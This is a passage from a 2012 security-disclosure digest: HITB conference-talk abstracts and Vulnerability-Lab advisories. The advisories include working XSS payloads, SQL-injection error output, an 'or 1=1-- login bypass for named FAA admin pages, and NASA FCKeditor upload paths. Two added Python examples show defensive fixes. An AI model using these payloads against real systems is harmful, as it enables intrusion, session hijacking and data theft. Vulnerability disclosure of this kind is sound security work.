In the case of invalid memory reads, we will exemplify how to indirectly influence the control flow of execution by reading arbitrary values, how to trace all the unaligned memory accesses and how to test if an invalid read can be turned into an invalid write or used to infer the mapping of the binary.

We will also introduce a new debugging technique which allows for very effective testing of all of the above by forcing the debugged process to fork(). Automatically. And with a rating of the best read/write location based on probabilities of mapping addresses (because of ASLR).

Credits:
Jonathan is a security research engineer holding an Engineering degree and a Master in Artificial Intelligence.
Born in France, he's been living in Brazil and India, before currently working in Australia. With about 15 years of practice of assembly, he is specialised in low level security, from raw sockets to cryptography and memory corruption bugs. He has been credited for the discovery of complex vulnerabilities in cryptographic software (eg: Microsoft Bitlocker, Truecrypt, and most BIOS software on the market including HP, Intel or Toshiba ones most notably), mainstream software (Opera web browser, Adobe Reader, top tier antivirus software) and virtualization software. He is currently working as Senior Security Consultant and CEO at the Toucan System security company (http://www.toucan-system.com). His clients count some of the biggest Defense and Financial Institutions worldwide. Jonathan is also the co-organiser of the Hackito Ergo Sum conference (HES2011) in France. Jonathan has been a speaker at a number of great international conferences including Blackhat, Defcon, HITB (Amsterdam, Kuala Lumpur), Ruxcon (Australia), Hackito Ergo Sum (France), and is a recurrent speaker at H2HC (Brazil, Mexico).
[Full-disclosure] HITB2011KUL - Mobile Malware Analysis
Title:
HITB2011KUL - Mobile Malware Analysis

Date:
2012-02-06

References:
Download: http://www.vulnerability-lab.com/resources/videos/424.wmv
View: http://www.youtube.com/watch?v=nVAuZ7jf7Sk

VL-ID:
424

Status:
Published

Exploitation-Technique:
Conference

Severity:
High

Details:
Mobile malware is becoming a larger concern every day, as the proliferation of smartphones continues and more and more in-the-wild malicious applications appear. Unfortunately, many people charged with malware analysis and/or network defense lack the tools or the know-how to analyze malicious binaries on anything but a standard Windows/x86 environment – and thus mobile malware remains shrouded in mystery, with inadequate response compared to traditional desktop-based malware.

This presentation aims to combat that problem. I'll explain the process of setting up a virtual machine capable of running and analyzing Android applications (chosen as the mobile platform most likely to see new malware), and then step through analysis of live samples collected from the wild. The analysis will focus primarily on network behavior that can be used to detect infected devices – something whose usefulness is not limited to cell phone carriers, given the number of mobile devices that communicate over local Wi-Fi networks.

Credits:
Alex Kirk is a senior member of the Sourcefire VRT, and has been involved in vulnerability analysis and detection since starting there in 2004. He currently runs the VRT's malware zoo, which has produced over 1TB worth of packet capture data by running live samples from the ClamAV virus database. He is the author of a pair of Snort-related chapters in the 2009 book "Practical Intrusion Analysis: Prevention and Detection for the Twenty-First Century," is a regular contributor to the VRT blog (http://vrt-blog.snort.org/), and routinely speaks at security conferences around the world on IDS-related topics.
[Full-disclosure] HITB2011KUL - Chip PIN - Protocol Analysis EMV POS
Title:
HITB2011KUL - Chip PIN - Protocol Analysis EMV POS

Date:
2012-01-26

References:
Download: http://www.vulnerability-lab.com/resources/videos/399.wmv
View: http://www.youtube.com/watch?v=5zFlqMFWYhc

VL-ID:
399

Status:
Published

Exploitation-Technique:
Conference

Severity:
Medium

Details:
The EMV global standard for electronic payments is widely used for inter-operation between chip equipped credit/debit cards, Point of Sales devices and ATMs. Following the trail of the serious vulnerabilities published by Murdoch and Drimer's team at Cambridge University regarding the usage of stolen cards, we explore the feasibility of skimming and cloning in the context of POS usage.

We will analyze in detail EMV flaws in PIN protection and illustrate skimming prototypes that can be covertly used to harvest credit card information as well as PIN numbers regardless of the type/configuration of the card. Our updated research also explores in depth the design, implementation and effectiveness of tamper proof sensors in modern and widely used POS terminals, illustrating different techniques for bypass and physical compromise. As usual cool gear and videos are going to be featured in order to maximize the presentation.

Credits:
Andrea Barisani
Andrea Barisani is a security researcher and consultant. His professional career began 10 years ago but all really started when a Commodore-64 first arrived in his home when he was 10. Now, 18 years later, Andrea is having fun with large-scale IDS/Firewalls deployment and administration, forensic analysis, vulnerability assessment, penetration testing, security training and his Open Source projects. He eventually found that system and security administration are the only effective way to express his need for paranoia.
Being an active member of the international Open Source and security community he's maintainer/author of the tenshi and ftester projects as well as the founder and project coordinator of the oCERT effort, the Open Source Computer Emergency Response Team. He has been involved in the Gentoo project, being a member of the Gentoo Security and Infrastructure Teams, and the Open Source Security Testing Methodology Manual, becoming an ISECOM Core Team member. Outside the community he has been a security consultant for Italian firms and he's now the co-founder and Chief Security Engineer of Inverse Path Ltd. He has been a speaker and trainer at PacSec, CanSecWest, BlackHat and DefCon conferences among many others, speaking about TEMPEST attacks, SatNav hacking, 0-days, LDAP and other pretty things.

Daniele Bianco
He began his professional career during his early years at university as system administrator and IT consultant for several scientific organizations. His interest in centralized management and software integration in Open Source environments has focused his work on design and development of suitable R&D infrastructure. One of his hobbies has always been playing with hardware and electronic devices. At the time being he is the resident Hardware Hacker for international consultancy Inverse Path where his research work focuses on embedded systems security, electronic devices protection and tamperproofing techniques. He presented at many IT security events and his works have been quoted by numerous popular media.
[Full-disclosure] HITB2011KUL - Is The Pen Still Mightier Than The Sword
Title:
HITB2011KUL - Is The Pen Still Mightier Than The Sword

Date:
2012-01-18

References:
Download: http://www.vulnerability-lab.com/resources/videos/385.wmv
View: http://www.youtube.com/watch?v=9dsYY_Zl4sk

VL-ID:
385

Status:
Published

Exploitation-Technique:
Conference

Severity:
Medium

Details:
Presentation Title: Is the Pen Still Mightier Than the Sword?

Presentation Abstract: In ancient Greece, Euripides warned that the tongue was sharper than the blade. In the Internet era, does the adage hold true? Julian Assange might agree, but what about the unknown author of Stuxnet? Access to information is nice, but the audience must have electricity to download and display the data. In this presentation, Dr. Geers will compare and contrast the national security implications of Wikileaks -- the new pen, and Stuxnet -- the new sword.

Credits:
Kenneth Geers, PhD, CISSP, is the U.S. Naval Criminal Investigative Service (NCIS) Cyber Subject Matter Expert. Mr. Geers was the first U.S. Representative to the NATO Cooperative Cyber Defence Centre of Excellence in Tallinn, Estonia. Mr. Geers has served as an intelligence analyst, a French and Russian linguist, and a computer programmer in support of arms control initiatives.
[Full-disclosure] NexorONE Online Banking - Multiple Cross Site Vulnerabilities
Title:
NexorONE Online Banking - Multiple Cross Site Vulnerabilities

Date:
2012-02-04

References:
http://www.vulnerability-lab.com/get_content.php?id=304

VL-ID:
304

Introduction:
NexorONE is the leading online banking software provider for Private International banks, Offshore Financial Institutions, Savings and Loans, Credit unions, Investment Fund Managers and Payment Processing Companies. NexorONE has already been deployed to more than 200 financial entities worldwide, spread out throughout 20 countries and in 12 different languages. With this market experience we know we can fulfill your business demands.

(Copy of the Vendor Homepage: https://www.nexorone.com/)

Abstract:
Vulnerability-Lab Team (Chokri B.A.) discovered multiple non-persistent Cross Site Scripting vulnerabilities on the NexorONE Online Banking Software.

Report-Timeline:
2011-10-05: Vendor Notification 1
2011-11-13: Vendor Notification 2
2011-12-17: Vendor Notification 3
2012-02-04: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
Medium

Details:
A non-persistent cross site scripting vulnerability is detected on the NexorONE Online Banking Software. Successful exploitation of the vulnerability allows an attacker to hijack user/mod/admin sessions of the portal.

Vulnerable file(s):
[+] login.php

Vulnerable Param(s):
[+] ?visitor_language=
[+] ?message=

Picture(s):
../1.png
../2.png
../3.png

Proof of Concept:
The vulnerabilities can be exploited by remote attackers with required user interaction. For demonstration or reproduce ...
PoC 1:
div class=login_line2_QUESTION_NEW_CUSTOMER a href=register.php?visitor_language=english\ img src=http://www.vulnerability-lab.com/gfx/partners/vlab.png tabindex=4_REGISTER/a =[x] /div/form

PoC 2:
div class=login_line2_QUESTION_NEW_CUSTOMER a href=register.php?visitor_language=english\\\ iframe src=http://www.vulnerability-lab.com onload=alert(vulnerabilitylab) height=800px width=900px =[x] tabindex=4_REGISTER/a/div/form

PoC 3:
div id=login table cellspacing=0 class=messagetrtdcenterRegistration_successful iframe src=http://www.vulnerability-lab.com onload=\alert(vulnerabilitylab);\ height=\800px\ width=\900px\ =[x] /center/td/tr/table

Risk:
The security risk of the non-reflective cross site scripting vulnerabilities is estimated as medium.

Credits:
Vulnerability Research Laboratory - Chokri B.A. (Me!ster the White)
[Full-disclosure] OSCommerce v3.0.2 - Persistent Cross Site Vulnerability
Title:
OSCommerce v3.0.2 - Persistent Cross Site Vulnerability

Date:
2012-02-02

VL-ID:
407

Introduction:
osCommerce is the leading Open Source online shop e-commerce solution that is available for free under the GNU General Public License. It features a rich set of out-of-the-box online shopping cart functionality that allows store owners to set up, run, and maintain their online stores with minimum effort and with no costs, license fees, or limitations involved. The goal of the osCommerce project is to continually evolve by attracting a community that supports the ongoing development of the project at its core level and extensively through contributions to provide additional functionality to the already existing rich feature set. Everything you need to get started in selling physical and digital goods over the internet, from the Catalog frontend that is presented to your customers, to the Administration Tool backend that completely handles your products, customers, orders, and online store data.

(Copy of the Vendor Homepage: http://www.opensourcecms.com/scripts/details.php?scriptid=94&name=osCommerce )

Abstract:
Vulnerability-Lab Team (F0x) discovered a persistent Cross Site Scripting Vulnerability in the OSCommerce Shop Software.

Report-Timeline:
2012-02-02: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
Medium

Details:
Multiple persistent cross site scripting vulnerabilities are detected in OSCommerce v3.0.2. The bug allows a remote attacker to inject malicious script code on the application side. Successful exploitation of the vulnerability allows an attacker to manipulate specific modules, which can lead to session hijacking (user/mod/admin).

Vulnerable Module(s):
[+] index.php?Cart

Proof of Concept:
The vulnerability can be exploited by a local low-privileged user account with medium required user interaction. For demonstration or reproduce ...

PoC:
'img src=vul onerror=alert('vulnerabilitylab') in the front field of the shirt module.

Output:
Size: Mediumbr/- Front: 'img src=vul onerror=alert('vulnerabilitylab')

Risk:
The security risk of the persistent vulnerability is estimated as medium.

Credits:
Vulnerability Research Laboratory - Alexander Fuchs (F0x23)
[Full-disclosure] Achievo v1.4.3 - Multiple Web Vulnerabilities
Title:
Achievo v1.4.3 - Multiple Web Vulnerabilities

Date:
2012-01-30

References:
http://www.vulnerability-lab.com/get_content.php?id=403

VL-ID:
403

Introduction:
Achievo is a flexible web-based resource management tool for business environments. Achievo's resource management capabilities will enable organisations to support their business processes in a simple, but effective manner. A solution that fits seamlessly to the wishes of every organisation and offers the possibility and freedom to adapt the functionality to the needs of the organisation. It will fit into every organisation because Achievo is extremely easy to change to your specific situation.

(Copy of the Vendor Website: http://www.achievo.nl/product/ )

Abstract:
Vulnerability-Lab Team (Chokri B.A.) discovered multiple web vulnerabilities in the resource management tool Achievo v1.4.3.

Report-Timeline:
2012-01-30: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
High

Details:
Multiple persistent cross site scripting and blind SQL injection vulnerabilities are detected in the resource management tool Achievo v1.4.3. The bugs allow a remote attacker to inject malicious script code on the application side and/or to execute SQL commands via a remote SQL injection attack. Successful exploitation of the vulnerabilities allows an attacker to manipulate specific modules, which can lead to session hijacking (user/mod/admin), and/or to compromise the application DBMS.

Vulnerable Module(s):
[+] Users preferences
[+] Projects
[+] Download vcard ( SQLi )

Picture(s):
../1.jpg
../2.jpg

Proof of Concept:
The vulnerabilities can be exploited by remote attackers with low required user interaction. For demonstration or reproduce ...

1.
select class=atkManyToOneRelation name=atksearch_AE_coordinator_AE_coordinator[]option value=Search all /optionoption value=__NONE__Nothing selected/optionoption value=1 img src=image.jpg onerror=alert(123); / [X] , test (manager)/optionoption value=2

2.
td valign=top class=fieldlabelbProject:/b /td td valign=top class=field img src: img src=image.jpg onerror=alert(1234); /[X] /td/tr

3.
http://www.achievo.nl/demos/achievo/stable/dispatch.php?atkaction=vcardatklevel=1atkprevlevel=0atkstackid=4f2467eae0518id=3'

Critical: Unknown error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'contact') ORDER BY person.role, person.lastname' at line 1). Halted
error: [+0.19090s / 0.00036s] Unknown error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'contact') ORDER BY person.role, person.lastname' at line 1) Halted...

Risk:
1.1
The security risk of the persistent XSS vulnerabilities is estimated as medium(+).

1.2
The security risk of the blind SQL injection vulnerabilities is estimated as high(+).

Credits:
Vulnerability Research Laboratory - Chokri B.A (Me!ster)
[Full-disclosure] NASA Subdomains FCKEditor - Multiple Vulnerabilities
Title:
NASA Subdomains FCKEditor - Multiple Vulnerabilities

Date:
2012-01-29

References:
http://vulnerability-lab.com/get_content.php?id=400

VL-ID:
400

Introduction:
The National Aeronautics and Space Administration (NASA) is the agency of the United States government that is responsible for the nation's civilian space program and for aeronautics and aerospace research. Since February 2006, NASA's mission statement has been to "pioneer the future in space exploration, scientific discovery and aeronautics research." On September 14, 2011, NASA announced that it had selected the design of a new Space Launch System that it said would take the agency's astronauts farther into space than ever before and provide the cornerstone for future human space exploration efforts by the U.S.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/NASA http://www.nasa.gov/news/reports/index.html )

Abstract:
A Vulnerability Lab researcher discovered multiple critical vulnerabilities in a NASA CMS application.

Report-Timeline:
2012-01-28: Vendor Notification
2012-02-01: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
Critical

Details:
Multiple remote file upload vulnerabilities and misconfiguration read bugs are detected on the official NASA CMS subdomains. The vulnerability allows reading the configuration and can result in malicious file uploads. Successful exploitation can result in DBMS and application compromise. The bugs are located in the available FCKeditor version; multiple NASA subdomains are vulnerable. An attacker can, for example, scan for FCKeditor bugs and exploit them via an automated routine. The method allows manipulation of multiple NASA subdomains.

Vulnerable Module(s):
[+] FCKeditor

Proof of Concept:
The vulnerabilities can be exploited by remote attackers without user interaction. For demonstration or reproduce ...

PoC:
science.gsfc.nasa.gov/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/browser/default/browser.html
smarts.nasa.gov/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/browser/default/browser.html

Note: You can use the path name like: CFIDE

Reference(s):
[TarGeT].nasa.gov/[patch]/scripts/ajax/FCKeditor/editor/filemanager/browser/default/browser.html
[TarGeT].nasa.gov/[patch]/scripts/ajax/FCKeditor/editor/fckeditor.original.html
[TarGeT].nasa.gov/[patch]/scripts/ajax/FCKeditor/editor/filemanager/browser/default/frmupload.html
[TarGeT].nasa.gov/[patch]/scripts/ajax/FCKeditor/editor/filemanager/browser/default/frmcreatefolder.html [sqli]
[TarGeT].nasa.gov/[patch]/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/config.cfm
[TarGeT].nasa.gov/[patch]/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm
[TarGeT].nasa.gov/[patch]/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/connector.cfm

Risk:
The security risk of the multiple vulnerabilities is estimated as high(+).

Credits:
K0242 [l3lack...@yahoo.com or l3lackhat...@gmail.com] - Houseofhackers.com
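The NASA advisory above points at FCKeditor's file-manager connector paths (browser, upload, create-folder and the config file). Where an upload endpoint of that kind has to stay enabled, the defensive control is server-side validation of what gets stored, independent of anything the client claims. The following is an added example in Python, written for this digest and not code from FCKeditor, NASA or Vulnerability-Lab; the allowed types, the upload directory and the test file names are constructed for the demonstration.

```python
import os
import secrets
from typing import Optional

# Allowlist of types an editor's image browser legitimately needs, keyed by the
# only extension that may be stored, with the file signature each must begin with.
# (Constructed for this example; tune to what the application actually serves.)
SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def safe_upload_name(client_filename: str, head: bytes) -> Optional[str]:
    """Return a server-chosen file name for an acceptable upload, or None.

    Checks, in order: the client name carries no path separators (so traversal
    such as "../x.png" is rejected rather than silently trimmed); the *last*
    extension is allowlisted (so "x.png.cfm" fails); and the first bytes of the
    content match that type's signature (so a script renamed to ".png" fails).
    The stored name is random, never the client's, so nothing the client sent
    reaches the file system.
    """
    if not client_filename or any(c in client_filename for c in "/\\\x00"):
        return None
    root, ext = os.path.splitext(client_filename)
    ext = ext[1:].lower()
    if not root or root.startswith(".") or ext not in SIGNATURES:
        return None
    if not head.startswith(SIGNATURES[ext]):
        return None
    return secrets.token_hex(16) + "." + ext


def store_upload(upload_dir: str, client_filename: str, data: bytes) -> Optional[str]:
    """Validate, then write under a random name with O_EXCL so an existing file
    is never overwritten. upload_dir is assumed to be served with script
    execution disabled; that is a web-server setting, not something this
    function can enforce."""
    name = safe_upload_name(client_filename, data[:16])
    if name is None:
        return None
    os.makedirs(upload_dir, exist_ok=True)
    path = os.path.join(upload_dir, name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


# Constructed sample inputs: a real PNG header and a ColdFusion-looking text blob.
PNG_HEAD = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
CFM_TEXT = b"<cfset x = 1>"

if __name__ == "__main__":
    for name, head in [("photo.png", PNG_HEAD), ("shell.cfm", CFM_TEXT),
                       ("shell.png.cfm", PNG_HEAD), ("shell.png", CFM_TEXT),
                       ("../../shell.png", PNG_HEAD)]:
        print(f"{name!r:22} -> {safe_upload_name(name, head)}")
```

The two checks that matter most are the last-extension rule and the content signature: an allowlist that looks at "any extension in the name" or trusts the Content-Type header is what double-extension and renamed-script uploads get past.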
[Full-disclosure] eBank IT Online Banking - Multiple Web Vulnerabilities
Title:
eBank IT Online Banking - Multiple Web Vulnerabilities

Date:
2012-01-26

References:
http://www.vulnerability-lab.com/get_content.php?id=313

VL-ID:
313

Introduction:
As a leading provider of innovative online banking software solutions, eBank-IT! provides an accessible venue for offering a full-valued online banking platform to your clients, using a cross-browser interface that's secure and free of complexities and considering maximum privacy and data protection procedures, as well as a wide scope of contenual functionalities, which exceed the standard scope of most major online banking systems in the world.

(Copy of the Vendor Website: http://www.ebank-it.com/ )

Abstract:
Vulnerability-Lab Team (Chokri B.A.) discovered multiple reflective web vulnerabilities in the Online Banking Software eBank-IT.

Report-Timeline:
2011-11-08: Vendor Notification
2011-**-**: Vendor Response/Feedback
2011-**-**: Vendor Fix/Patch
2012-01-27: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
Medium

Details:
Multiple reflective cross site scripting vulnerabilities are detected in the online banking software eBank-IT. The bug allows a remote attacker to inject malicious script code on the application side. Successful exploitation of the vulnerability allows an attacker to manipulate specific modules, which can lead to session hijacking (user/mod/admin).

Vulnerable Module(s):
[+] login
[+] requestpw

Pictures:
../1.png
../2.png

Proof of Concept:
The vulnerabilities can be exploited by remote attackers with low required user interaction. For demonstration or reproduce ...

tr td width=7% img src=images2/icons/error.gif/td td width=94% class=cal_font\img src=http://www.vulnerability-lab.com/gfx/partners/vlab.png / /td /tr

tr td colspan=3 align=center\img src=http://www.vulnerability-lab.com/gfx/partners/vlab.png / /td /tr

Risk:
The security risk of the reflective XSS vulnerabilities is estimated as medium.

Credits:
Vulnerability Research Laboratory - Chokri B.A (Me!ster)
[Full-disclosure] ME Monitoring Manager v9.x; v10.x - Multiple Vulnerabilities
Title:
ME Monitoring Manager v9.x; v10.x - Multiple Vulnerabilities

Date:
2012-01-27

References:
http://www.vulnerability-lab.com/get_content.php?id=115

VL-ID:
115

Introduction:
With ManageEngine Applications Manager, IT administrators of enterprises and data center groups can monitor the performance of their heterogeneous applications from a single web console, receive alerts on problems, troubleshoot and diagnose faults, analyse trends and plan capacity with the help of comprehensive reports. To meet the varied requirements of all administrators, Applications Manager supports important products. These are divided into three categories: the "Application Server Monitoring" functionality provides detailed information on commonly used software such as Java/J2EE, Microsoft .NET, Oracle Application Server and Tomcat. Many applications in turn depend on these services, so securing the stability of these application servers is essential. On the database side, logs and administrative information for common products such as Oracle databases, MySQL and DB2 are queried and can trigger notifications immediately after the query. This helps to intervene before critical states are reached. Finally, "System Management" completes the three categories, since in addition to the applications and databases the layer beneath them, the operating systems, is also monitored by Applications Manager. It makes no difference whether you use Microsoft Windows, various Linux distributions or Mac OS, for example.

(Copy of the Vendor Homepage: http://www.manageengine.com/ )

Abstract:
Vulnerability-Lab Team discovered multiple vulnerabilities in Application Monitoring Manager by ManageEngine.

Report-Timeline:
2011-08-01: Vendor Notification
2011-**-**: Vendor Response/Feedback
2011-**-**: Vendor Fix/Patch
2012-01-27: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
High

Details:
1.1
Multiple non-persistent input validation vulnerabilities are detected (client-side). Attackers can hijack customer/admin sessions via cross site scripting.

Vulnerable Module(s):
[+] ThresholdActionConfiguration
[+] PopUp_Graph
[+] Showresource

Picture(s):
../1.png
../2.png
../3.png

1.2
Multiple SQL injection vulnerabilities are detected in the alert module via the ?periods parameter request.

Vulnerable Param(s):
[+] ?periods

--- SQL Error Logs ---
Syntax error or access violation message from server: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near root at line 1 ; nested exception is: java.sql.SQLException: Syntax error or access violation message from server: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near root at line 1

Picture(s):
../4.png
../5.png

Proof of Concept:
The vulnerabilities can be exploited by remote attackers. For demonstration or reproduce ...

1.1
Path: /jsp/
File: ThresholdActionConfiguration.jsp
Para: ?resourceid=1579&attributeIDs=1902&attributeToSelect=1902&redirectto=

Path: ../jsp/
File: PopUp_Graph.jsp
Para: ?restype=QueryMonitor&monID=1499&resids=10003726&baseid=1011&attids=1113&listsize=1&attName=

Path: ../
File: showresource.do
Para: showresource.do?method=showResourceTypes&network=

References:
http://xxx.com/Search.do?query=%3E%22%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%3Cdiv+style%3D%221domain=all
http://xxx.com/jsp/ThresholdActionConfiguration.jsp?resourceid=1579attributeIDs=1902attributeToSelect=1902 redirectto=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221
[Full-disclosure] FAA US Academy (AFS) - Auth Bypass Vulnerability
Title:
FAA US Academy (AFS) - Auth Bypass Vulnerability

Date:
2012-01-28

References:
http://vulnerability-lab.com/get_content.php?id=171

VL-ID:
171

Introduction:
This is a FAA computer system. FAA computer systems are provided for the processing of Official U.S. Government information only. All data contained on FAA computer systems is owned by the FAA and may be monitored, intercepted, recorded, read, copied, or captured in any manner and disclosed in any manner, by authorized personnel. THERE IS NO RIGHT OF PRIVACY IN THIS SYSTEM. System personnel may give to law enforcement officials any potential evidence of crime found on FAA computer systems. USE OF THIS SYSTEM BY ANY USER, AUTHORIZED OR UNAUTHORIZED, CONSTITUTES CONSENT TO THIS MONITORING, INTERCEPTION, RECORDING, READING, COPYING, OR CAPTURING and DISCLOSURE.

(Copy of the Vendor Homepage: http://www.faa.gov/afs650/ )

Abstract:
An anonymous Vulnerability-Laboratory researcher/analyst discovered an auth bypass vulnerability in the AFS application of the Federal Aviation Administration [Academy].

Report-Timeline:
2011-02-07: Vendor Notification 1
2011-03-23: Vendor Notification 2
2011-07-19: Vendor Notification 3
2011-**-**: Vendor Response/Feedback
2011-**-**: Vendor Fix/Patch
2012-01-28: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
Critical

Details:
An auth bypass vulnerability is detected in the FAA AFS Evaluation Application System. The bug is located in a vulnerable login form which allows a remote attacker to bypass the application's authentication. Successful exploitation can result in DBMS and academy website compromise via injection.

Vulnerable Module(s):
[+] Login - All Forms

Affected Version(s):
FAA AFS-300 Aircraft Maintenance Division
FAA AFS-630 Customer Satisfaction Survey
FAA AFS-640 Course Evaluation
FAA AFS-650 Evaluation System
--- AFS-630, AFS-640 & AFS-650

Proof of Concept:
The auth bypass vulnerability can be exploited by remote attackers. For demonstration ...

Username: 'or 1=1--
Password: 'or 1=1--

Reference(s):
http://www.xxx.faa.gov/afs650/admin/
http://www.xxx.faa.gov/afs640/admin/
http://www.xxx.faa.gov/afs630/admin/

Note: Remember it's forbidden (law) to access or attack the FAA Computer System! We just analysed a submission!

Risk:
The security risk of the auth bypass vulnerability is estimated as critical.

Credits:
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)
[Full-disclosure] Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities
Title:
Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities

Date:
2012-01-27

References:
http://vulnerability-lab.com/get_content.php?id=144

VL-ID:
144

Introduction:
The FortiGate series of multi-threat security systems detect and eliminate the most damaging, content-based threats from email and Web traffic such as viruses, worms, intrusions, inappropriate Web content and more in real time - without degrading network performance. Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 series for large enterprises, service providers and carriers, the FortiGate line combines the FortiOS™ security operating system with FortiASIC processors and other hardware to provide a comprehensive and high-performance array of security and networking functions including:

* Firewall, VPN, and Traffic Shaping
* Intrusion Prevention System (IPS)
* Antivirus/Antispyware/Antimalware
* Web Filtering
* Antispam
* Application Control (e.g., IM and P2P)
* VoIP Support (H.323. and SCCP)
* Layer 2/3 routing
* Multiple WAN interface options

FortiGate appliances provide cost-effective, comprehensive protection against network, content, and application-level threats - including complex attacks favored by cybercriminals - without degrading network availability and uptime. FortiGate platforms incorporate sophisticated networking features, such as high availability (active/active, active/passive) for maximum network uptime, and virtual domain (VDOM) capabilities to separate various networks requiring different security policies.

(Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate/ http://www.avfirewalls.com/ )

Abstract:
1.1 Vulnerability-Lab Team discovered multiple persistent web vulnerabilities in the FortiGate UTM Appliance Application.
1.2 Vulnerability-Lab Team discovered multiple non-persistent web vulnerabilities in the FortiGate UTM Appliance Application.

Report-Timeline:
2012-01-27: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
High

Details:
1.1
Multiple input validation vulnerabilities (persistent) are detected in the FortiGate UTM Appliance Series. A remote attacker can include (persistent) malicious script code to manipulate specific customer/admin requests. The vulnerability allows a local low-privileged attacker to manipulate the appliance (application) via persistent script code injection. It is also possible to hijack customer sessions via persistent script code execution on the application side. Successful exploitation can also result in content/module request manipulation, execution of persistent malicious script code, session hijacking, account stealing and phishing.

Vulnerable Module(s): (Persistent)
[+] Endpoint = Monitor = Endpoint Monitor
[+] Dialup List
[+] LogReport = Display

Picture(s):
../ive2.png
../ive3.png

1.2
Multiple input validation vulnerabilities (non-persistent) are detected in the FortiGate UTM Appliance Series. The vulnerability allows remote attackers to hijack admin/customer sessions with required user interaction (client-side). Successful exploitation allows an attacker to phish user accounts, redirect client-side requests or manipulate website content in client-side browser requests.

Vulnerable Module(s): (Non-Persistent)
[+] Endpoint - NAC - Application Database - Listings
[+] List field sorted

Picture(s):
../ive1.png

Proof of Concept:
The vulnerabilities can be exploited by remote attackers with or without user interaction. For demonstration or reproduce ...

poc:
http://www.vulnerability-lab.com/get_content.php?id=144

Solution:
1.1
To fix the persistent input validation vulnerabilities, restrict the input fields and parse the input. Locate the vulnerable area(s), reproduce the bugs and parse the output after a malicious (test) insert. Set up a filter or restriction mask to prevent future persistent input validation attacks.

1.2
To fix the client-side input validation vulnerability, parse the vulnerable request by filtering the input and cleaning up the output. Set an input restriction or configure a whitelist/filter to stop malicious client-side requests, and build secure exception handling around it.

Risk:
1.1
The security risk of the persistent vulnerabilities is estimated as high because of multiple persistent
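The solution above (restrict the input, encode the output, add a whitelist) is the same pair of controls that would close the reflected and persistent cross-site scripting findings in the NexorONE, OSCommerce, Achievo and eBank-IT advisories earlier in this digest. The following is an added example in Python, written for this digest and not code from Vulnerability-Lab, Fortinet or any other vendor named here; the parameter name visitor_language comes from the NexorONE advisory, while the language allowlist, the cookie name and the payload strings are constructed for the demonstration.

```python
import html
from typing import Optional
from urllib.parse import quote

# Allowlist for a parameter with a fixed vocabulary, modelled on the
# ?visitor_language= parameter in the NexorONE advisory (values are constructed).
ALLOWED_LANGUAGES = frozenset({"english", "german", "french", "spanish"})


def validate_language(raw: str) -> Optional[str]:
    """Input restriction: accept only a value from the fixed vocabulary.

    Returns the canonical value, or None for anything else, including a known
    value with markup appended to it. A fixed vocabulary is the strongest
    "whitelist/filter" there is: nothing outside it ever reaches the page.
    """
    candidate = raw.strip().lower()
    return candidate if candidate in ALLOWED_LANGUAGES else None


def render_message_unsafe(message: str) -> str:
    """The pattern behind a reflected XSS: the request parameter is copied into
    the page verbatim, so '<' and '"' in the input become markup in the output."""
    return '<td class="message">' + message + "</td>"


def render_message_safe(message: str) -> str:
    """Output encoding for the HTML text context: html.escape turns <, >, &, "
    and ' into entities, so the browser displays the input instead of parsing it."""
    return '<td class="message">' + html.escape(message, quote=True) + "</td>"


def build_register_link(raw_language: str) -> str:
    """Attribute/URL context: validate against the allowlist first, then
    percent-encode for the query string and entity-encode for the attribute.
    An unknown value falls back to the default instead of being echoed."""
    lang = validate_language(raw_language) or "english"
    href = "register.php?visitor_language=" + quote(lang, safe="")
    return '<a href="' + html.escape(href, quote=True) + '" tabindex="4">Register</a>'


def session_cookie_header(session_id: str) -> str:
    """Mitigation for the session-hijacking impact the advisories describe:
    a session cookie that page script cannot read (HttpOnly), that is only
    sent over TLS (Secure) and that is not attached to cross-site POSTs
    (SameSite=Lax). The cookie name is an assumption for this example."""
    return (
        "Set-Cookie: session=" + quote(session_id, safe="")
        + "; Path=/; HttpOnly; Secure; SameSite=Lax"
    )


# Constructed test inputs, modelled on the shape of the advisories' payloads.
PAYLOAD_TEXT = "<img src=x onerror=alert(1)>"
PAYLOAD_ATTR = 'english"><iframe src=//example.invalid onload=alert(1)>'

if __name__ == "__main__":
    print(render_message_unsafe(PAYLOAD_TEXT))   # markup survives, so it would execute
    print(render_message_safe(PAYLOAD_TEXT))     # entities only, displayed as text
    print(build_register_link(PAYLOAD_ATTR))     # unknown value, falls back to english
    print(session_cookie_header("constructed-session-id"))
```

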